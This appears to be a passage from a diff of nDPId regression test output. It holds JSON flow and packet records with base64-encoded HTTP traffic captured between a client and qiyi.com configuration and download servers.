W50OzRDRDQxOTkyNjI5ODBBRjY5RDA3OThEREFBNDJGM0M5DQptYXNmbGFnPWh0dHA6Ly9tYmRhcHAuaXFpeWkuY29tL2ovb3QvbWFzZmxhZy56aXA7U3RhcnQ7RTNGRDlCMjEzMEFCQTIxNTc1QjRGNDk2RDg5Q0FGOTINCm1hc2F1dG89aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9tYXNhdXRvLnppcDtTdGFydDtEMTQ3M0E5Mjg2MjBENjZGMzM0QjI4RUYxRjk0QjA3OA0KbWFzYmxvZz1odHRwOi8vbWJkYXBwLmlxaXlpLmNvbS9qL290L21hc2Jsb2cuemlwO1N0YXJ0O0JGRENCNTM1QzNFRUIwMkZEREI5NjFEMDVBNTIzQjI2DQpDb29raWVDbGVhcj1odHRwOi8vbWJkYXBwLmlxaXlpLmNvbS9qL290L0Nvb2tpZUNsZWFyLnppcDtTdGFydDtGMzlBRDlFOTgzREJCMzA5MkYxQzNDNDIwRjJBNDgyQQ=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190110,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1467353190110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190110,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5kJVAADMGqbHKbA7bwKhzCABQxUpzStvEq5YvP1AYADaqqAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1404,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190168,"flow_last_seen":1467353190168,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190168,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1404,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1467353190168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190168,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FPRAADMGJVPKbA7bwKhzCABQxHdtLPipvNGQx1AYAMQhYwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190040,"flow_last_seen":1467353190040,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1467353190040,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1467353190040,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1467353190040,"pkt":"TF4M6gNlABxCjnAxCABFAADGLkBAAIAGTxPAqHMI3xpqE8VLAFDaxGl\/7FKS9VAYQTcFigAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL2Rvd25sb2FkaGVscGVyLmluaSBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBEb3dubG9hZEhlbHBlcl9ydW54eA0KSG9zdDogc3RhdGljLnFpeWkuY29tDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQo="} +00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190040,"flow_last_seen":1467353190040,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1467353190040,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloadhelper.ini","code":0,"content_type":"","user_agent":"DownloadHelper_runxx"}} +01802{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1467353190044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1063,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1063,"pkt_l4_len":1029,"thread_ts_msec":1467353190044,"pkt":"ABxCjnAxTF4M6gNlCABFAAQZtrxAADgGC0TfGmoTwKhzCABQxUvsUpL12sRqHVAYAB9YnAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoyOSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogNjY3DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjE3OjMwIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW0NvbnRyb2xdDQpjb3VudD02DQpjMD1DaGVja0NsaWVudA0KYzE9UVlBZ2VudA0KYzI9bWFzZmxhZw0KYzM9bWFzYXV0bw0KYzQ9bWFzYmxvZw0KYzU9Q29va2llQ2xlYXINCltEb3dubG9hZGVyXQ0KQ2hlY2tDbGllbnQ9aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9DaGVja0NsaWVudC56aXA7U3RhcnQ7OTdEQzFBMTJCQzMyMkNERjRCQjE5MjNDNEVGMTRFMUINClFZQWdlbnQ9aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9RWUFnZW50LnppcDtTdGFydEFnZW50OzRDRDQxOTkyNjI5ODBBRjY5RDA3OThEREFBNDJGM0M5DQptYXNmbGFnPWh0dHA6Ly9tYmRhcHAuaXFpeWkuY29tL2ovb3QvbWFzZmxhZy56aXA7U3RhcnQ7RTNGRDlCMjEzMEFCQTIxNTc1QjRGNDk2RDg5Q0FGOTINCm1hc2F1dG89aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9tYXNhdXRvLnppcDtTdGFydDtEMTQ3M0E5Mjg2MjBENjZGMzM0QjI4RUYxRjk0QjA3OA0KbWFzYmxvZz1odHRwOi8vbWJkYXBwLmlxaXlpLmNvbS9qL290L21hc2Jsb2cuemlwO1N0YXJ0O0JGRENCNTM1QzNFRUIwMkZEREI5NjFEMDVBNTIzQjI2DQpDb29raWVDbGVhcj1odHRwOi8vbWJkYXBwLmlxaXlpLmNvbS9qL290L0Nvb2tpZUNsZWFyLnppcDtTdGFydDtGMzlBRDlFOTgzREJCMzA5MkYxQzNDNDIwRjJBNDgyQQ=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190110,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1467353190110,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190110,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5kJVAADMGqbHKbA7bwKhzCABQxUpzStvEq5YvP1AYADaqqAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1404,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190168,"flow_last_seen":1467353190168,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190168,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1404,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1467353190168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190168,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FPRAADMGJVPKbA7bwKhzCABQxHdtLPipvNGQx1AYAMQhYwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1405,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1467353190178,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353190178,"pkt":"AQBef\/\/6jHNut5ODCABFAAChAlEAAAERAT3AqAUc7\/\/\/+up3B2wAjbFHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1467353190235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190235,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FPVAADMGJVLKbA7bwKhzCABQxHdtLPk6vNGSM1AYANYfVAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190634,"flow_last_seen":1467353190634,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353190634,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1467353190634,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353190634,"pkt":"TF4M6gNlABxCjnAxCABFAAC4LnBAAIAGTvHAqHMI3xpqE8VMAFCjClS\/APxWfFAYQTf8ogAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL1FZQWdlbnQuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IFFZQWdlbnRfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190634,"flow_last_seen":1467353190634,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353190634,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/QYAgent.ini","code":0,"content_type":"","user_agent":"QYAgent_runxx"}} -00940{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1467353190638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":420,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":420,"pkt_l4_len":386,"thread_ts_msec":1467353190638,"pkt":"ABxCjnAxTF4M6gNlCABFAAGWcOxAADgGU5ffGmoTwKhzCABQxUwA\/FZ8owpVT1AYAB8JQAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMCBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMjUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkV4cGlyZXM6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MzA6MDcgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KWC1DYWNoZTogSElUIGZyb20gMTAuMTIxLjMzLjk3DQpYLUNhY2hlOiBISVQgZnJvbSAyMjMuMjYuMTA2LjE5DQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQpbUVlBZ2VudF0NCnY9MA0KcD0xMDANCmU9"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190892,"flow_last_seen":1467353190892,"flow_idle_time":7440000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1467353190892,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1467353190892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"thread_ts_msec":1467353190892,"pkt":"TF4M6gNlABxCjnAxCABFAACVLoRAAIAGUpzAqHMIaibba8VNAFAdei0\/k1iI9FAYQTd0xwAAR0VUIC9jaXR5anNvbiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVlBZ2VudF9ydW54eA0KSG9zdDogaXBsb2NhdGlvbi5nZW8ucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190892,"flow_last_seen":1467353190892,"flow_idle_time":7440000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1467353190892,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"iplocation.geo.qiyi.com","url":"iplocation.geo.qiyi.com\/cityjson","code":0,"content_type":"","user_agent":"QYAgent_runxx"}} -01043{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1467353190978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":497,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":497,"pkt_l4_len":463,"thread_ts_msec":1467353190978,"pkt":"ABxCjnAxTF4M6gNlCABFAAHjK+5AADIGoeRqJttrwKhzCABQxU2TWIj0HXotrFAYAOXEmAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eQ0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMCBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sO2NoYXJzZXQ9dXRmLTgNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LVR5cGU6IGNoYXJzZXQ9dXRmLTgNCg0KZjINCnZhciByZXR1cm5JcENpdHkgPXsiY29kZSI6IkEwMDAwMCIsICJkYXRhIjogeyJpcCI6IjExOC4xNjMuOC45MCIsICJpc3AiOiLkuK3ljY7nlLXkv6EiLCAiY291bnRyeSI6IuS4reWbveWkp+mZhiIsICJwcm92aW5jZSI6IuWPsOa5viIsICJjaXR5IjoiTm9uZSIsICJpc3BfaWQiOjY5LCAiY291bnRyeV9pZCI6NDgsICJwcm92aW5jZV9pZCI6MjI4LCAiY2l0eV9pZCI6MjI4MDAwLCAibG9jYXRpb25faWQiOjY5MjI4MDAwfX0KDQo="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1411,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1467353190978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":25,"thread_ts_msec":1467353190978,"pkt":"ABxCjnAxTF4M6gNlCABFAAAtK+9AADIGo5lqJttrwKhzCABQxU2TWIqvHXotrFAYAOXCuQAAMA0KDQoA"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191500,"flow_last_seen":1467353191500,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191500,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1467353191500,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191500,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L9BAAIAGTZDAqHMI3xpqFMZOAFCUEYDiYZCIJlAYQTcJ9QAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2ZsYWcuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2ZsYWdfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191500,"flow_last_seen":1467353191500,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191500,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masflag.ini","code":0,"content_type":"","user_agent":"masflag_runxx"}} -01040{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1467353191505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":493,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":493,"pkt_l4_len":459,"thread_ts_msec":1467353191505,"pkt":"ABxCjnAxTF4M6gNlCABFAAHfpuJAADgGHVffGmoUwKhzCABQxk5hkIgmlBGBclAYAB+\/UwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogOTgNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkV4cGlyZXM6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MTI6MTAgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KWC1DYWNoZTogSElUIGZyb20gMTAuMTIxLjMzLjk3DQpYLUNhY2hlOiBISVQgZnJvbSAyMjMuMjYuMTA2LjIwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQpbbWFzZmxhZ10NCnY9Mg0KcD00MA0KZT2xsb6pL8nPuqMNCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191521,"flow_last_seen":1467353191521,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191521,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1467353191521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191521,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L9RAAIAGTYzAqHMI3xpqFMZPAFCekgJEnvl6klAYQTcvHQAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2F1dG8uaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2F1dG9fcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191521,"flow_last_seen":1467353191521,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191521,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masauto.ini","code":0,"content_type":"","user_agent":"masauto_runxx"}} 